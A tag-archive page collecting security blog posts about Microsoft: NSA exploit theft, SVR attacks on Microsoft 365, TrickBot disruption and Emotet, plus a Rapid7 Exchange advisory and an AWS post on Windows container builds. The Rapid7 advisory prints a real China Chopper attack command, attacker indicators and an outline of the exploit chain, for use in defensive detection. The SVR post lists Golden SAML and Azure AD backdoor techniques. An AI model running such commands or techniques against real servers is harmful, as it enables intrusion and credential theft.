Tag Archives: microsoft

Chinese Hackers Stole an NSA Windows Exploit in 2014

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/03/chinese-hackers-stole-an-nsa-windows-exploit-in-2014.html

Check Point has evidence that (probably government affiliated) Chinese hackers stole and cloned an NSA Windows hacking tool years before (probably government affiliated) Russian hackers stole and then published the same tool. Here’s the timeline:

The timeline basically seems to be, according to Check Point:

  • 2013: NSA’s Equation Group developed a set of exploits including one called EpMe that elevates one’s privileges on a vulnerable Windows system to system-administrator level, granting full control. This allows someone with a foothold on a machine to commandeer the whole box.
  • 2014-2015: China’s hacking team code-named APT31, aka Zirconium, developed Jian by, one way or another, cloning EpMe.
  • Early 2017: The Equation Group’s tools were teased and then leaked online by a team calling itself the Shadow Brokers. Around that time, Microsoft cancelled its February Patch Tuesday, identified the vulnerability exploited by EpMe (CVE-2017-0005), and fixed it in a bumper March update. Interestingly enough, Lockheed Martin was credited as alerting Microsoft to the flaw, suggesting it was perhaps used against an American target.
  • Mid 2017: Microsoft quietly fixed the vulnerability exploited by the leaked EpMo exploit.

Lots of news articles about this.

Indiscriminate Exploitation of Microsoft Exchange Servers (CVE-2021-24085)

Post Syndicated from Andrew Christian original https://blog.rapid7.com/2021/03/02/indiscriminate-exploitation-of-microsoft-exchange-servers-cve-2021-24085/

The following blog post was co-authored by Andrew Christian and Brendan Watters.

Beginning Feb. 27, 2021, Rapid7’s Managed Detection and Response (MDR) team has observed a notable increase in the automated exploitation of vulnerable Microsoft Exchange servers to upload a webshell granting attackers remote access. The suspected vulnerability being exploited is a cross-site request forgery (CSRF) vulnerability: The likeliest culprit is CVE-2021-24085, an Exchange Server spoofing vulnerability released as part of Microsoft’s February 2021 Patch Tuesday advisory, though other CVEs may also be at play (e.g., CVE-2021-26855, CVE-2021-26865, CVE-2021-26857).

The following China Chopper command was observed multiple times beginning Feb. 27 using the same DigitalOcean source IP (165.232.154.116):

cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&net group "Exchange Organization administrators" administrator /del /domain&echo [S]&cd&echo [E]

Exchange or other systems administrators who see this command—or any other China Chopper command in the near future—should look for the following in IIS logs:

  • 165.232.154.116 (the source IP of the requests)
  • /ecp/y.js
  • /ecp/DDI/DDIService.svc/GetList
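As a first triage step, those indicators can be swept for with a simple log search. The following is a minimal sketch that assumes the default IIS log location; adjust the path and the set of log files you scan for your environment.

# Hedged sketch: search IIS logs for the indicators listed above.
# The log path below is the IIS default and may differ in your environment.
$logPath  = "C:\inetpub\logs\LogFiles"
$patterns = @("165\.232\.154\.116", "/ecp/y\.js", "/ecp/DDI/DDIService\.svc/GetList")

Get-ChildItem -Path $logPath -Filter *.log -Recurse |
    Select-String -Pattern $patterns |
    Select-Object Path, LineNumber, Line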

Indicators of compromise (IOCs) from the attacks we have observed are consistent with IOCs for publicly available exploit code targeting CVE-2021-24085 released by security researcher Steven Seeley last week, shortly before indiscriminate exploitation began. After initial exploitation, attackers drop an ASP eval webshell before (usually) executing procdump against lsass.exe in order to grab all the credentials from the box. Attackers could then also clean some indicators of compromise from the affected machine(s). We have included a section on CVE-2021-24085 exploitation at the end of this document.

Exchange servers are frequent, high-value attack targets whose patch rates often lag behind attacker capabilities. Rapid7 Labs has identified nearly 170,000 Exchange servers vulnerable to CVE-2021-24085 on the public internet:

[Chart: internet-facing Exchange servers vulnerable to CVE-2021-24085]

Rapid7 recommends that Exchange customers apply Microsoft’s February 2021 updates immediately. InsightVM and Nexpose customers can assess their exposure to CVE-2021-24085 and other February Patch Tuesday CVEs with vulnerability checks. InsightIDR provides existing coverage for this vulnerability via our out-of-the-box China Chopper Webshell Executing Commands detection, and will alert you about any suspicious activity. View this detection in the Attacker Tool section of the InsightIDR Detection Library.

CVE-2021-24085 exploit chain

As part of the PoC for CVE-2021-24085, the attacker will search for a specific token using a request to /ecp/DDI/DDIService.svc/GetList. If that request is successful, the PoC moves on to writing the desired token to the server’s filesystem with the request /ecp/DDI/DDIService.svc/SetObject. At that point, the token is available for downloading directly. The PoC uses a download request to /ecp/poc.png (though the name could be anything), which may be recorded in the IIS logs themselves, attached to the IP of the initial attack.

Indicators of compromise would include the requests to both /ecp/DDI/DDIService.svc/GetList and /ecp/DDI/DDIService.svc/SetObject, especially if those requests were associated with an odd user agent string like python. Because the PoC utilizes SetObject to write the token to the server’s filesystem in a world-readable location, it would be beneficial for incident responders to examine any files that were created around the time of the requests, as one of those files could be the access token and should be removed or placed in a secure location. It is also possible that responders could discover the file name in question by checking to see if the original attacker’s IP downloaded any files.
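Building on that last point, a sketch like the following can list files created around the time of the suspicious requests. The web root path and the time window are placeholders; take the actual values from your own IIS log timestamps.

# Hedged sketch: list files created in a window around the GetList/SetObject requests.
# $start, $end, and the web root are placeholders; adjust them from your IIS logs.
$start = Get-Date "2021-02-27T00:00:00Z"
$end   = Get-Date "2021-02-28T00:00:00Z"

Get-ChildItem -Path "C:\inetpub\wwwroot" -Recurse -File |
    Where-Object { $_.CreationTimeUtc -ge $start -and $_.CreationTimeUtc -le $end } |
    Sort-Object CreationTimeUtc |
    Select-Object FullName, CreationTimeUtc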

Twelve-Year-Old Vulnerability Found in Windows Defender

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/02/twelve-year-old-vulnerability-found-in-windows-defender.html

Researchers found, and Microsoft has patched, a vulnerability in Windows Defender that has been around for twelve years. There is no evidence that anyone has used the vulnerability during that time.

The flaw, discovered by researchers at the security firm SentinelOne, showed up in a driver that Windows Defender — renamed Microsoft Defender last year — uses to delete the invasive files and infrastructure that malware can create. When the driver removes a malicious file, it replaces it with a new, benign one as a sort of placeholder during remediation. But the researchers discovered that the system doesn’t specifically verify that new file. As a result, an attacker could insert strategic system links that direct the driver to overwrite the wrong file or even run malicious code.

It isn’t unusual that vulnerabilities lie around for this long. They can’t be fixed until someone finds them, and people aren’t always looking.

SVR Attacks on Microsoft 365

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/01/svr-attacks-on-microsoft-365.html

FireEye is reporting the current known tactics that the SVR used to compromise Microsoft 365 cloud data as part of its SolarWinds operation:

Mandiant has observed UNC2452 and other threat actors moving laterally to the Microsoft 365 cloud using a combination of four primary techniques:

  • Steal the Active Directory Federation Services (AD FS) token-signing certificate and use it to forge tokens for arbitrary users (sometimes described as Golden SAML). This would allow the attacker to authenticate into a federated resource provider (such as Microsoft 365) as any user, without the need for that user’s password or their corresponding multi-factor authentication (MFA) mechanism.
  • Modify or add trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls. This would allow the attacker to forge tokens for arbitrary users and has been described as an Azure AD backdoor.
  • Compromise the credentials of on-premises user accounts that are synchronized to Microsoft 365 that have high privileged directory roles, such as Global Administrator or Application Administrator.
  • Backdoor an existing Microsoft 365 application by adding a new application or service principal credential in order to use the legitimate permissions assigned to the application, such as the ability to read email, send email as an arbitrary user, access user calendars, etc.

Lots of details here, including information on remediation and hardening.

The more we learn about this operation, the more sophisticated it becomes.

In related news, MalwareBytes was also targeted.

US Cyber Command and Microsoft Are Both Disrupting TrickBot

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/10/us-cyber-command-and-microsoft-are-both-disrupting-trickbot.html

Earlier this month, we learned that someone is disrupting the TrickBot botnet network.

Over the past 10 days, someone has been launching a series of coordinated attacks designed to disrupt Trickbot, an enormous collection of more than two million malware-infected Windows PCs that are constantly being harvested for financial data and are often used as the entry point for deploying ransomware within compromised organizations.

On Sept. 22, someone pushed out a new configuration file to Windows computers currently infected with Trickbot. The crooks running the Trickbot botnet typically use these config files to pass new instructions to their fleet of infected PCs, such as the Internet address where hacked systems should download new updates to the malware.

But the new configuration file pushed on Sept. 22 told all systems infected with Trickbot that their new malware control server had the address 127.0.0.1, which is a “localhost” address that is not reachable over the public Internet, according to an analysis by cyber intelligence firm Intel 471.

A few days ago, the Washington Post reported that it’s the work of US Cyber Command:

U.S. Cyber Command’s campaign against the Trickbot botnet, an army of at least 1 million hijacked computers run by Russian-speaking criminals, is not expected to permanently dismantle the network, said four U.S. officials, who spoke on the condition of anonymity because of the matter’s sensitivity. But it is one way to distract them at least for a while as they seek to restore operations.

The network is controlled by “Russian speaking criminals,” and the fear is that it will be used to disrupt the US election next month.

The effort is part of what Gen. Paul Nakasone, the head of Cyber Command, calls “persistent engagement,” or the imposition of cumulative costs on an adversary by keeping them constantly engaged. And that is a key feature of CyberCom’s activities to help protect the election against foreign threats, officials said.

Here’s General Nakasone talking about persistent engagement.

Microsoft is also disrupting Trickbot:

We disrupted Trickbot through a court order we obtained as well as technical action we executed in partnership with telecommunications providers around the world. We have now cut off key infrastructure so those operating Trickbot will no longer be able to initiate new infections or activate ransomware already dropped into computer systems.

[…]

We took today’s action after the United States District Court for the Eastern District of Virginia granted our request for a court order to halt Trickbot’s operations.

During the investigation that underpinned our case, we were able to identify operational details including the infrastructure Trickbot used to communicate with and control victim computers, the way infected computers talk with each other, and Trickbot’s mechanisms to evade detection and attempts to disrupt its operation. As we observed the infected computers connect to and receive instructions from command and control servers, we were able to identify the precise IP addresses of those servers. With this evidence, the court granted approval for Microsoft and our partners to disable the IP addresses, render the content stored on the command and control servers inaccessible, suspend all services to the botnet operators, and block any effort by the Trickbot operators to purchase or lease additional servers.

To execute this action, Microsoft formed an international group of industry and telecommunications providers. Our Digital Crimes Unit (DCU) led investigation efforts including detection, analysis, telemetry, and reverse engineering, with additional data and insights to strengthen our legal case from a global network of partners including FS-ISAC, ESET, Lumen’s Black Lotus Labs, NTT and Symantec, a division of Broadcom, in addition to our Microsoft Defender team. Further action to remediate victims will be supported by internet service providers (ISPs) and computer emergency readiness teams (CERTs) around the world.

This action also represents a new legal approach that our DCU is using for the first time. Our case includes copyright claims against Trickbot’s malicious use of our software code. This approach is an important development in our efforts to stop the spread of malware, allowing us to take civil action to protect customers in the large number of countries around the world that have these laws in place.

Brian Krebs comments:

In legal filings, Microsoft argued that Trickbot irreparably harms the company “by damaging its reputation, brands, and customer goodwill. Defendants physically alter and corrupt Microsoft products such as the Microsoft Windows products. Once infected, altered and controlled by Trickbot, the Windows operating system ceases to operate normally and becomes tools for Defendants to conduct their theft.”

This is a novel use of trademark law.

Vulnerability Finding Using Machine Learning

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/vulnerability_f.html

Microsoft is training a machine-learning system to find software bugs:

At Microsoft, 47,000 developers generate nearly 30 thousand bugs a month. These items get stored across over 100 AzureDevOps and GitHub repositories. To better label and prioritize bugs at that scale, we couldn’t just apply more people to the problem. However, large volumes of semi-curated data are perfect for machine learning. Since 2001 Microsoft has collected 13 million work items and bugs. We used that data to develop a process and machine learning model that correctly distinguishes between security and non-security bugs 99 percent of the time and accurately identifies the critical, high priority security bugs, 97 percent of the time.

News article.

I wrote about this in 2018:

The problem of finding software vulnerabilities seems well-suited for ML systems. Going through code line by line is just the sort of tedious problem that computers excel at, if we can only teach them what a vulnerability looks like. There are challenges with that, of course, but there is already a healthy amount of academic literature on the topic — and research is continuing. There’s every reason to expect ML systems to get better at this as time goes on, and some reason to expect them to eventually become very good at it.

Finding vulnerabilities can benefit both attackers and defenders, but it’s not a fair fight. When an attacker’s ML system finds a vulnerability in software, the attacker can use it to compromise systems. When a defender’s ML system finds the same vulnerability, he or she can try to patch the system or program network defenses to watch for and block code that tries to exploit it.

But when the same system is in the hands of a software developer who uses it to find the vulnerability before the software is ever released, the developer fixes it so it can never be used in the first place. The ML system will probably be part of his or her software design tools and will automatically find and fix vulnerabilities while the code is still in development.

Fast-forward a decade or so into the future. We might say to each other, “Remember those years when software vulnerabilities were a thing, before ML vulnerability finders were built into every compiler and fixed them before the software was ever released? Wow, those were crazy years.” Not only is this future possible, but I would bet on it.

Getting from here to there will be a dangerous ride, though. Those vulnerability finders will first be unleashed on existing software, giving attackers hundreds if not thousands of vulnerabilities to exploit in real-world attacks. Sure, defenders can use the same systems, but many of today’s Internet of Things (IoT) systems have no engineering teams to write patches and no ability to download and install patches. The result will be hundreds of vulnerabilities that attackers can find and use.

Microsoft Buys Corp.com

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/microsoft_buys_.html

A few months ago, Brian Krebs told the story of the domain corp.com, and how it is basically a security nightmare:

At issue is a problem known as “namespace collision,” a situation where domain names intended to be used exclusively on an internal company network end up overlapping with domains that can resolve normally on the open Internet.

Windows computers on an internal corporate network validate other things on that network using a Microsoft innovation called Active Directory, which is the umbrella term for a broad range of identity-related services in Windows environments. A core part of the way these things find each other involves a Windows feature called “DNS name devolution,” which is a kind of network shorthand that makes it easier to find other computers or servers without having to specify a full, legitimate domain name for those resources.

For instance, if a company runs an internal network with the name internalnetwork.example.com, and an employee on that network wishes to access a shared drive called “drive1,” there’s no need to type “drive1.internalnetwork.example.com” into Windows Explorer; typing “\\drive1\” alone will suffice, and Windows takes care of the rest.

But things can get far trickier with an internal Windows domain that does not map back to a second-level domain the organization actually owns and controls. And unfortunately, in early versions of Windows that supported Active Directory — Windows 2000 Server, for example — the default or example Active Directory path was given as “corp,” and many companies apparently adopted this setting without modifying it to include a domain they controlled.

Compounding things further, some companies then went on to build (and/or assimilate) vast networks of networks on top of this erroneous setting.

Now, none of this was much of a security concern back in the day when it was impractical for employees to lug their bulky desktop computers and monitors outside of the corporate network. But what happens when an employee working at a company with an Active Directory network path called “corp” takes a company laptop to the local Starbucks?

Chances are good that at least some resources on the employee’s laptop will still try to access that internal “corp” domain. And because of the way DNS name devolution works on Windows, that company laptop online via the Starbucks wireless connection is likely to then seek those same resources at “corp.com.”

In practical terms, this means that whoever controls corp.com can passively intercept private communications from hundreds of thousands of computers that end up being taken outside of a corporate environment which uses this “corp” designation for its Active Directory domain.

Microsoft just bought it, so it wouldn’t fall into the hands of any bad actors:

In a written statement, Microsoft said it acquired the domain to protect its customers.

“To help in keeping systems protected we encourage customers to practice safe security habits when planning for internal domain and network names,” the statement reads. “We released a security advisory in June of 2009 and a security update that helps keep customers safe. In our ongoing commitment to customer security, we also acquired the Corp.com domain.”

Emotet Malware Causes Physical Damage

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/emotat_malware_.html

Microsoft is reporting that an Emotet malware infection shut down a network by causing computers to overheat and then crash.

The Emotet payload was delivered and executed on the systems of Fabrikam — a fake name Microsoft gave the victim in their case study — five days after the employee’s user credentials were exfiltrated to the attacker’s command and control (C&C) server.

Before this, the threat actors used the stolen credentials to deliver phishing emails to other Fabrikam employees, as well as to their external contacts, with more and more systems getting infected and downloading additional malware payloads.

The malware further spread through the network without raising any red flags by stealing admin account credentials and using them to authenticate itself on new systems, which were later used as stepping stones to compromise other devices.

Within eight days of that first booby-trapped attachment being opened, Fabrikam’s entire network was brought to its knees despite the IT department’s efforts, with PCs overheating, freezing, and rebooting because of blue screens, and Internet connections slowing down to a crawl because of Emotet devouring all the bandwidth.

The infection mechanism was one employee opening a malicious attachment to a phishing email. I can’t find any information on what kind of attachment.

Building Windows containers with AWS CodePipeline and custom actions

Post Syndicated from Dmitry Kolomiets original https://aws.amazon.com/blogs/devops/building-windows-containers-with-aws-codepipeline-and-custom-actions/

Dmitry Kolomiets, DevOps Consultant, Professional Services

AWS CodePipeline and AWS CodeBuild are the primary AWS services for building CI/CD pipelines. AWS CodeBuild supports a wide range of build scenarios thanks to various built-in Docker images. It also allows you to bring in your own custom image in order to use different tools and environment configurations. However, there are some limitations in using custom images.

Considerations for custom Docker images:

  • AWS CodeBuild has to download a new copy of the Docker image for each build job, which may take a long time for large Docker images.
  • AWS CodeBuild provides a limited set of instance types to run the builds. You might have to use a custom image if the build job requires higher memory, CPU, graphical subsystems, or any other functionality that is not part of the Docker images provided out of the box.

Windows-specific limitations

  • AWS CodeBuild supports Windows builds only in a limited number of AWS regions at this time.
  • AWS CodeBuild executes Windows Server containers using Windows Server 2016 hosts, which means that build containers are huge: it is not uncommon to have an image size of 15 GB or more (with the .NET Framework SDK installed). Windows Server 2019 containers, which are almost half the size, cannot be used due to a host/container version mismatch.
  • AWS CodeBuild runs build jobs inside Docker containers. You should enable privileged mode in order to build and publish Linux Docker images as part of your build job. However, Docker-in-Docker (DIND) is not supported on Windows and, therefore, AWS CodeBuild cannot be used to build Windows Server container images.

The last point is the critical one for microservice-style applications based on Microsoft stacks (.NET Framework, Web API, IIS). The usual workflow for these applications is to build a Docker image, push it to Amazon ECR, and update the ECS or EKS cluster deployment.

Here is what I cover in this post:

  • How to address the limitations stated above by implementing AWS CodePipeline custom actions (applicable for both Linux and Windows environments).
  • How to use the created custom action to define a CI/CD pipeline for Windows Server containers.

CodePipeline custom actions

By using Amazon EC2 instances, you can address the limitations with Windows Server containers and enable Windows build jobs in the regions where AWS CodeBuild does not provide native Windows build environments. To accommodate the specific needs of a build job, you can pick one of the many Amazon EC2 instance types available.

The downside of this approach is the additional management burden: neither AWS CodeBuild nor AWS CodePipeline supports Amazon EC2 instances directly. There are ways to set up a Jenkins build cluster on AWS and integrate it with CodeBuild and CodeDeploy, but these options are too “heavy” for the simple task of building a Docker image.

There is a different way to tackle this problem: AWS CodePipeline provides APIs that allow you to extend a build action through custom actions. This example demonstrates how to add a custom action to offload a build job to an Amazon EC2 instance.

Here is the generic sequence of steps that the custom action performs:

  • Acquire EC2 instance (see the Notes on Amazon EC2 build instances section).
  • Download AWS CodePipeline artifacts from Amazon S3.
  • Execute the build command and capture any errors.
  • Upload output artifacts to be consumed by subsequent AWS CodePipeline actions.
  • Update the status of the action in AWS CodePipeline.
  • Release the Amazon EC2 instance.

Notice that most of these steps are the same regardless of the actual build job being executed. However, the following parameters will differ between CI/CD pipelines and, therefore, have to be configurable:

  • Instance type (t2.micro, t3.2xlarge, etc.)
  • AMI (builds could have different prerequisites in terms of OS configuration, software installed, Docker images downloaded, etc.)
  • Build command line(s) to execute (MSBuild script, bash, Docker, etc.)
  • Build job timeout

Serverless custom action architecture

A CodePipeline custom build action can be implemented as an agent component installed on an Amazon EC2 instance. The agent polls CodePipeline for build jobs and executes them on the Amazon EC2 instance. There is an example of such an agent on GitHub, but this approach requires installation and configuration of the agent on all Amazon EC2 instances that carry out the build jobs.

Instead, I want to introduce an architecture that enables any Amazon EC2 instance to be a build agent without additional software and configuration required. The architecture diagram looks as follows:

Serverless custom action architecture

There are multiple components involved:

  1. An Amazon CloudWatch Event triggers an AWS Lambda function when a custom CodePipeline action is to be executed.
  2. The Lambda function retrieves the action’s build properties (AMI, instance type, etc.) from CodePipeline, along with location of the input artifacts in the Amazon S3 bucket.
  3. The Lambda function starts a Step Functions state machine that carries out the build job execution, passing all the gathered information as input payload.
  4. The Step Functions flow acquires an Amazon EC2 instance according to the provided properties, waits until the instance is up and running, and starts an AWS Systems Manager command. The Step Functions flow is also responsible for handling all the errors during build job execution and releasing the Amazon EC2 instance once the Systems Manager command execution is complete.
  5. The Systems Manager command runs on an Amazon EC2 instance, downloads CodePipeline input artifacts from the Amazon S3 bucket, unzips them, executes the build script, and uploads any output artifacts to the CodePipeline-provided Amazon S3 bucket.
  6. The polling Lambda function updates the state of the custom action in CodePipeline once it detects that the Step Functions flow has completed.

The whole architecture is serverless and requires no maintenance in terms of software installed on Amazon EC2 instances thanks to the Systems Manager command, which is essential for this solution. All the code, AWS CloudFormation templates, and installation instructions are available on the GitHub project. The following sections provide further details on the mentioned components.

Custom Build Action

The custom action type is defined as an AWS::CodePipeline::CustomActionType resource as follows:

  Ec2BuildActionType: 
    Type: AWS::CodePipeline::CustomActionType
    Properties: 
      Category: !Ref CustomActionProviderCategory
      Provider: !Ref CustomActionProviderName
      Version: !Ref CustomActionProviderVersion
      ConfigurationProperties: 
        - Name: ImageId 
          Description: AMI to use for EC2 build instances.
          Key: true 
          Required: true
          Secret: false
          Queryable: false
          Type: String
        - Name: InstanceType
          Description: Instance type for EC2 build instances.
          Key: true 
          Required: true
          Secret: false
          Queryable: false
          Type: String
        - Name: Command
          Description: Command(s) to execute.
          Key: true 
          Required: true
          Secret: false
          Queryable: false
          Type: String 
        - Name: WorkingDirectory 
          Description: Working directory for the command to execute.
          Key: true 
          Required: false
          Secret: false
          Queryable: false
          Type: String 
        - Name: OutputArtifactPath 
          Description: Path of the file(-s) or directory(-es) to use as custom action output artifact.
          Key: true 
          Required: false
          Secret: false
          Queryable: false
          Type: String 
      InputArtifactDetails: 
        MaximumCount: 1
        MinimumCount: 0
      OutputArtifactDetails: 
        MaximumCount: 1
        MinimumCount: 0 
      Settings: 
        EntityUrlTemplate: !Sub "https://${AWS::Region}.console.aws.amazon.com/systems-manager/documents/${RunBuildJobOnEc2Instance}"
        ExecutionUrlTemplate: !Sub "https://${AWS::Region}.console.aws.amazon.com/states/home#/executions/details/{ExternalExecutionId}"

The custom action type is uniquely identified by Category, Provider name, and Version.

Category defines the stage of the pipeline in which the custom action can be used, such as build, test, or deploy. Check the AWS documentation for the full list of allowed values.

Provider name and Version are the values used to identify the custom action type in the CodePipeline console or AWS CloudFormation templates. Once the custom action type is installed, you can add it to the pipeline, as shown in the following screenshot:

Adding custom action to the pipeline

The custom action type also defines a list of user-configurable properties—these are the properties identified above as specific for different CI/CD pipelines:

  • AMI Image ID
  • Instance Type
  • Command
  • Working Directory
  • Output artifacts

The properties are configurable in the CodePipeline console, as shown in the following screenshot:

Custom action properties

Note the last two settings in the Custom Action Type AWS CloudFormation definition: EntityUrlTemplate and ExecutionUrlTemplate.

EntityUrlTemplate defines the link to the AWS Systems Manager document that carries out the build actions. The link is visible in the AWS CodePipeline console, as shown in the following screenshot:

Custom action's EntityUrlTemplate link

ExecutionUrlTemplate defines the link to additional information related to a specific execution of the custom action. The link is also visible in the CodePipeline console, as shown in the following screenshot:

Custom action's ExecutionUrlTemplate link

This URL is defined as a link to the Step Functions execution details page, which provides high-level information about the custom build step execution, as shown in the following screenshot:

Custom build step execution

This page is a convenient visual representation of the custom action execution flow and may be useful for troubleshooting purposes, as it gives immediate access to error messages and logs.

The polling Lambda function

The Lambda function polls CodePipeline for custom actions when it is triggered by the following CloudWatch event:

  source: 
    - "aws.codepipeline"
  detail-type: 
    - "CodePipeline Action Execution State Change"
  detail: 
    state: 
      - "STARTED"

The event is triggered for every CodePipeline action that starts, so the Lambda function should first verify that there is indeed a custom action of the expected type to be processed.
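For illustration, that check could look like the following sketch. This is not the project’s actual Lambda function (which may be written differently and in another language); the detail.type fields reflect the documented shape of the Action Execution State Change event, and the category and provider values are placeholders for whatever you registered for the custom action type.

# Hedged sketch: skip events that are not for our custom action type.
function Test-IsOurCustomAction {
    param($Event)    # parsed CloudWatch event object

    # "Build" and "EC2-Build" are assumptions: use whatever category and
    # provider you registered for the custom action type.
    $type = $Event.detail.type
    return (($type.owner -eq "Custom") -and
            ($type.category -eq "Build") -and
            ($type.provider -eq "EC2-Build"))
}

# $LambdaInput is supplied by the AWS Lambda PowerShell runtime (assuming a
# PowerShell Lambda; the same check applies in any language).
if (-not (Test-IsOurCustomAction -Event $LambdaInput)) { return }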

The rest of the Lambda function is straightforward and relies on the following APIs to retrieve or update CodePipeline actions and to work with Step Functions state machine executions:

CodePipeline API

AWS Step Functions API

You can find the complete source of the Lambda function on GitHub.

Step Functions state machine

The following diagram shows the complete Step Functions state machine. There are three main blocks in the diagram:

  • Acquiring an Amazon EC2 instance and waiting while the instance is registered with Systems Manager
  • Running a Systems Manager command on the instance
  • Releasing the Amazon EC2 instance

Note that it is necessary to release the Amazon EC2 instance in case of an error or exception during Systems Manager command execution; the state machine relies on Fallback States to guarantee that.

You can find the complete definition of the Step Function state machine on GitHub.

Step Functions state machine

Systems Manager Document

The AWS Systems Manager Run Command does all the magic. The Systems Manager agent is pre-installed on AWS Windows and Linux AMIs, so no additional software is required. The Systems Manager run command executes the following steps to carry out the build job:

  1. Download input artifacts from Amazon S3.
  2. Unzip artifacts in the working folder.
  3. Run the command.
  4. Upload output artifacts to Amazon S3, if any; this makes them available for the following CodePipeline stages.

The preceding steps are operating-system agnostic, and both Linux and Windows instances are supported. The following code snippet shows the Windows-specific steps.

You can find the complete definition of the Systems Manager document on GitHub.

mainSteps:
  - name: win_enable_docker
    action: aws:configureDocker
    inputs:
      action: Install

  # Windows steps
  - name: windows_script
    precondition:
      StringEquals: [platformType, Windows]
    action: aws:runPowerShellScript
    inputs:
      runCommand:
        # Ensure that if a command fails the script does not proceed to the following commands
        - "$ErrorActionPreference = \"Stop\""

        - "$jobDirectory = \"{{ workingDirectory }}\""
        # Create temporary folder for build artifacts, if not provided
        - "if ([string]::IsNullOrEmpty($jobDirectory)) {"
        - "    $parent = [System.IO.Path]::GetTempPath()"
        - "    [string] $name = [System.Guid]::NewGuid()"
        - "    $jobDirectory = (Join-Path $parent $name)"
        - "    New-Item -ItemType Directory -Path $jobDirectory"
                # Set current location to the new folder
        - "    Set-Location -Path $jobDirectory"
        - "}"

        # Download/unzip input artifact
        - "Read-S3Object -BucketName {{ inputBucketName }} -Key {{ inputObjectKey }} -File artifact.zip"
        - "Expand-Archive -Path artifact.zip -DestinationPath ."

        # Run the build commands
        - "$directory = Convert-Path ."
        - "$env:PATH += \";$directory\""
        - "{{ commands }}"
        # We need to check exit code explicitly here
        - "if (-not ($?)) { exit $LASTEXITCODE }"

        # Compress output artifacts, if specified
        - "$outputArtifactPath  = \"{{ outputArtifactPath }}\""
        - "if ($outputArtifactPath) {"
        - "    Compress-Archive -Path $outputArtifactPath -DestinationPath output-artifact.zip"
                # Upload compressed artifact to S3
        - "    $bucketName = \"{{ outputBucketName }}\""
        - "    $objectKey = \"{{ outputObjectKey }}\""
        - "    if ($bucketName -and $objectKey) {"
                    # Don't forget to encrypt the artifact - CodePipeline bucket has a policy to enforce this
        - "        Write-S3Object -BucketName $bucketName -Key $objectKey -File output-artifact.zip -ServerSideEncryption aws:kms"
        - "    }"
        - "}"
      workingDirectory: "{{ workingDirectory }}"
      timeoutSeconds: "{{ executionTimeout }}"

CI/CD pipeline for Windows Server containers

Once you have a custom action that offloads the build job to the Amazon EC2 instance, you may approach the problem stated at the beginning of this blog post: how to build and publish Windows Server containers on AWS.

With the custom action installed, the solution is quite straightforward. To build a Windows Server container image, you need to provide a Windows Server with Containers AMI ID, the instance type to use, and the command line to execute, as shown in the following screenshot:

Windows Server container custom action properties

This example executes the Docker build command on a Windows instance with the specified AMI and instance type, using the provided source artifact. In real life, you may want to keep the build script along with the source code and push the built image to a container registry. The following is a PowerShell script example that not only produces a Docker image but also pushes it to AWS ECR:

# Authenticate with ECR
Invoke-Expression -Command (Get-ECRLoginCommand).Command

# Build and push the image
docker build -t <ecr-repository-url>:latest .
docker push <ecr-repository-url>:latest

return $LASTEXITCODE

You can find a complete example of the pipeline that produces the Windows Server container image and pushes it to Amazon ECR on GitHub.

Notes on Amazon EC2 build instances

There are a few ways to get Amazon EC2 instances for custom build actions. Let’s take a look at a couple of them below.

Start new EC2 instance per job and terminate it at the end

This is a reasonable default strategy that is implemented in this GitHub project. Each time the pipeline needs to process a custom action, you start a new Amazon EC2 instance, carry out the build job, and terminate the instance afterwards.

This approach is easy to implement. It works well for scenarios in which you don’t have many builds and/or builds take some time to complete (tens of minutes). In this case, the time required to provision an instance is amortized. Conversely, if the builds are fast, instance provisioning time could actually be longer than the time required to carry out the build job.
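With AWS Tools for PowerShell, the acquire/release bracket of this strategy boils down to something like the following sketch (not the project’s exact code); the AMI ID and instance type are placeholders, and the build itself would run through Systems Manager as described earlier.

# Hedged sketch of the start/terminate strategy.
Import-Module AWSPowerShell

# Acquire: launch a fresh build instance (placeholder AMI and instance type).
$reservation = New-EC2Instance -ImageId "ami-xxxxxxxxxxxxxxxxx" -InstanceType "t3.large" -MinCount 1 -MaxCount 1
$instanceId  = $reservation.Instances[0].InstanceId

try {
    # ... wait for the instance to register with Systems Manager and run the build ...
}
finally {
    # Release: terminate the instance even if the build failed.
    Remove-EC2Instance -InstanceId $instanceId -Force
}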

Use a pool of running Amazon EC2 instances

There are cases where you need to keep build instances “warm”, either due to complex initialization or simply to reduce build duration. To support this scenario, you could maintain a pool of always-running instances. The “acquisition” phase takes a warm instance from the pool, and the “release” phase returns it without terminating or stopping the instance. A DynamoDB table can be used as a registry to keep track of “busy” instances and to provide waiting or scaling capabilities to handle high demand.

This approach works well for scenarios in which there are many builds and demand is predictable (e.g. during work hours).

Use a pool of stopped Amazon EC2 instances

This is an interesting approach, especially for Windows builds. All AWS Windows AMIs are generalized using the Sysprep tool. The important implication of this is that the first start time for Windows EC2 instances is quite long: it could easily take more than 5 minutes. This is generally unacceptable for short-lived build jobs (if your build takes just a minute, it is annoying to wait 5 minutes for the instance to start).

Interestingly, once the Windows instance is initialized, subsequent starts take less than a minute. To utilize this, you could create a pool of initialized and stopped Amazon EC2 instances. In this case, for the acquisition phase, you start the instance, and when you need to release it, you stop or hibernate it.
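A sketch of that acquire/release cycle might look like the following; the BuildPool tag used to find pool members is an assumption, and a real implementation would also need to mark the chosen instance as busy (for example, in a registry table as described in the previous strategy).

# Hedged sketch of the stopped-pool strategy (not the project's exact code).
Import-Module AWSPowerShell

# Acquire: find a stopped instance in the pool (tag name/value are placeholders) and start it.
$filters = @(
    @{ Name = "tag:BuildPool"; Values = "windows" },
    @{ Name = "instance-state-name"; Values = "stopped" }
)
$candidate = (Get-EC2Instance -Filter $filters).Instances | Select-Object -First 1
Start-EC2Instance -InstanceId $candidate.InstanceId

# ... run the build job via Systems Manager ...

# Release: stop the instance so the next build gets a warm start.
Stop-EC2Instance -InstanceId $candidate.InstanceId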

This approach provides substantial improvements in terms of build start-up time.

The downside is that you reuse the same Amazon EC2 instance between builds, so it is not a completely clean environment. Build jobs have to be designed to expect the presence of artifacts from previous executions on the build instance.

Using an Amazon EC2 fleet with spot instances

